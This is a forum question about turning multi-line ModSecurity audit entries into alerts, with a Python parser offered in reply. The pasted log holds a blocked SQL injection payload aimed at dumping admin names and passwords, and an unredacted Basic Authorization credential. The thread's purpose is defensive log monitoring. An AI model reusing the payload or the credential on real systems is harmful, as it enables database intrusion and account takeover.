mod_security log monitoring?

Has anyone attempted to monitor the mod_security logs? Do you have any suggestions or recommendations on where I should start?
So, I can monitor the log file /var/log/httpd/audit_log using log[/var/log/httpd/audit_log,"","UTF-8",100]; the only issue is that my audit_log would retain several lines as such:

Code:
--a0733335-A--
[10/Apr/2012:14:05:54 --0700] T4SgsgoUMgYAAAz-IuIAAAAN 192.168.55.2 55786 10.20.50.6 443
--a0733335-B--
GET /?action=&type=view&s=&id=-1%27%20union%20select%200,concat(char(85),char(115),char(101),char(114),char(110),char(97),char(109),char(101),char(58),name,char(32),char(124),char(124),char(32),char(80),char(97),char(115),char(115),char(119),char(111),char(114),char(100),char(58),pass),0,0,0,0,0%20from%20phpdesk_admin/* HTTP/1.1
Host: ******************
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:11.0) Gecko/20100101 Firefox/11.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Authorization: Basic d3Nhbmk6dHIrYXcydWY=
--a0733335-F--
HTTP/1.1 403 Forbidden
Last-Modified: Sat, 18 Oct 2008 00:13:54 GMT
Accept-Ranges: bytes
Content-Length: 5043
Keep-Alive: timeout=10
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
--a0733335-H--
Message: [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "319"] [id "340017"] [rev "47"] [msg "Atomicorp.com WAF Rules: Generic SQL injection protection in ARGS"] [data "union select"] [severity "CRITICAL"] Access denied with code 403 (phase 2). Match of "rx (?:^/edit_page$|/node/[0-9]+/edit|^/forum/posting\\.php|^/admins/wnedit\\.php|/alt_doc\\.php\\?returnUrl=.*edit|^/admin/categories\\.php\\?cPath=.*|modules\\.php\\?name=Forums&file=posting&mode=.*|^/joomla/administrator/index2\\.php|^/wiki/index\\.php? ..." against "REQUEST_URI" required.
Action: Intercepted (phase 2)
Stopwatch: 1334091954894231 27290 (- - -)
Stopwatch2: 1334091954894231 27290; combined=1913, p1=63, p2=1840, p3=0, p4=0, p5=10, sr=0, sw=0, l=0, gc=0
WAF: ModSecurity for Apache/2.6.5 (http://www.modsecurity.org/); 201001071602; 201001071602.
Server: Apache
--a0733335-Z--

I'd like to be able to display this in the alert. Is this possible?
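Since the Zabbix log item reads a file one line at a time, one way to get a whole multi-line audit entry into an alert is to have a small pre-processor collapse each entry into a single summary line in a separate file that the log item then watches. The Python parser below is an added example written for this thread; it is not code from the poster, from Zabbix or from the ModSecurity project. It reads ModSecurity's serial audit-log format (the --id-A-- ... --id-Z-- sections shown in the post above), pulls out the fields worth alerting on (client address, rule id, msg, severity, response status, request line) and redacts Authorization and Cookie headers so credentials are never copied into the alert text. The sample entry embedded in the block is constructed for the example, and the names parse_audit_log, to_alert_line and summarize_log, as well as the output path audit_summary.log, are the example's own assumptions.

```python
import re
import sys
from dataclasses import dataclass, field
from typing import Dict, Iterator, List, Optional

# Constructed sample entry in ModSecurity's serial audit-log format (not taken
# from the thread); addresses and the Authorization value are placeholders.
SAMPLE_AUDIT_LOG = """\
--c1d2e3f4-A--
[10/Apr/2012:14:05:54 --0700] Tx0000000000000000000000 192.0.2.10 55786 198.51.100.6 443
--c1d2e3f4-B--
GET /?id=-1%27%20union%20select%200 HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0
Authorization: Basic dXNlcjpwYXNz
--c1d2e3f4-F--
HTTP/1.1 403 Forbidden
Content-Type: text/html; charset=UTF-8
--c1d2e3f4-H--
Message: [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "319"] [id "340017"] [rev "47"] [msg "Atomicorp.com WAF Rules: Generic SQL injection protection in ARGS"] [data "union select"] [severity "CRITICAL"] Access denied with code 403 (phase 2).
Action: Intercepted (phase 2)
Stopwatch: 1334091954894231 27290 (- - -)
--c1d2e3f4-Z--
"""

# Section boundary: --<hex id>-<section letter>--
BOUNDARY_RE = re.compile(r"^--([0-9a-fA-F]+)-([A-Z])--$")
# Section A: [timestamp] txid client_ip client_port server_ip server_port
SECTION_A_RE = re.compile(
    r"^\[(?P<ts>[^\]]+)\] (?P<txid>\S+) (?P<cip>\S+) (?P<cport>\d+) (?P<sip>\S+) (?P<sport>\d+)$"
)
# Bracketed tags inside a Message: line, e.g. [id "340017"] [severity "CRITICAL"]
TAG_RE = re.compile(r'\[(?P<key>[a-z]+) "(?P<val>[^"]*)"\]')
SENSITIVE_HEADERS = {"authorization", "proxy-authorization", "cookie"}


@dataclass
class AuditEvent:
    boundary: str
    timestamp: str = ""
    txid: str = ""
    client_ip: str = ""
    server_ip: str = ""
    request_line: str = ""
    headers: Dict[str, str] = field(default_factory=dict)
    status: Optional[int] = None
    messages: List[Dict[str, str]] = field(default_factory=list)
    action: str = ""


def _parse_section(ev: AuditEvent, letter: str, lines: List[str]) -> None:
    """Fill in the event from the buffered lines of one section (A, B, F or H)."""
    if letter == "A" and lines:
        m = SECTION_A_RE.match(lines[0])
        if m:
            ev.timestamp, ev.txid = m.group("ts"), m.group("txid")
            ev.client_ip, ev.server_ip = m.group("cip"), m.group("sip")
    elif letter == "B" and lines:
        ev.request_line = lines[0]
        for line in lines[1:]:
            name, sep, value = line.partition(":")
            if not sep:
                continue
            name, value = name.strip(), value.strip()
            if name.lower() in SENSITIVE_HEADERS:
                value = "[REDACTED]"  # keep credentials out of the summary/alert
            ev.headers[name] = value
    elif letter == "F" and lines:
        parts = lines[0].split()  # "HTTP/1.1 403 Forbidden"
        if len(parts) >= 2 and parts[1].isdigit():
            ev.status = int(parts[1])
    elif letter == "H":
        for line in lines:
            if line.startswith("Message:"):
                ev.messages.append({m.group("key"): m.group("val") for m in TAG_RE.finditer(line)})
            elif line.startswith("Action:"):
                ev.action = line.partition(":")[2].strip()


def parse_audit_log(text: str) -> Iterator[AuditEvent]:
    """Yield one AuditEvent per --id-A-- ... --id-Z-- entry in serial-format text."""
    ev: Optional[AuditEvent] = None
    letter: Optional[str] = None
    buf: List[str] = []
    for raw in text.splitlines():
        m = BOUNDARY_RE.match(raw)
        if m:
            if ev is not None and letter is not None:
                _parse_section(ev, letter, buf)  # flush the section that just ended
            boundary, letter = m.group(1), m.group(2)
            buf = []
            if letter == "A":
                ev = AuditEvent(boundary=boundary)
            elif letter == "Z":
                if ev is not None:
                    yield ev
                ev, letter = None, None
            continue
        if ev is not None and raw.strip():
            buf.append(raw)


def to_alert_line(ev: AuditEvent) -> str:
    """Collapse an event into the single line a line-oriented log monitor can match."""
    first = ev.messages[0] if ev.messages else {}
    return (
        f"{ev.timestamp} client={ev.client_ip} status={ev.status} "
        f"rule={first.get('id', '-')} severity={first.get('severity', '-')} "
        f"msg=\"{first.get('msg', '-')}\" action=\"{ev.action}\" "
        f"host={ev.headers.get('Host', '-')} request=\"{ev.request_line}\""
    )


def summarize_log(text: str) -> List[str]:
    return [to_alert_line(ev) for ev in parse_audit_log(text)]


if __name__ == "__main__":
    # Usage (assumed path): python audit_summary.py < /var/log/httpd/audit_log >> audit_summary.log
    src = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_AUDIT_LOG
    for line in summarize_log(src):
        print(line)
```

Each summary line carries the rule id, severity and request on one line, so a log item such as log[/var/log/httpd/audit_summary.log,"severity=CRITICAL","UTF-8",100] (assumed path) can trigger on it and the whole line can be placed in the alert; section C (request body) is deliberately ignored so payloads are not echoed into notifications.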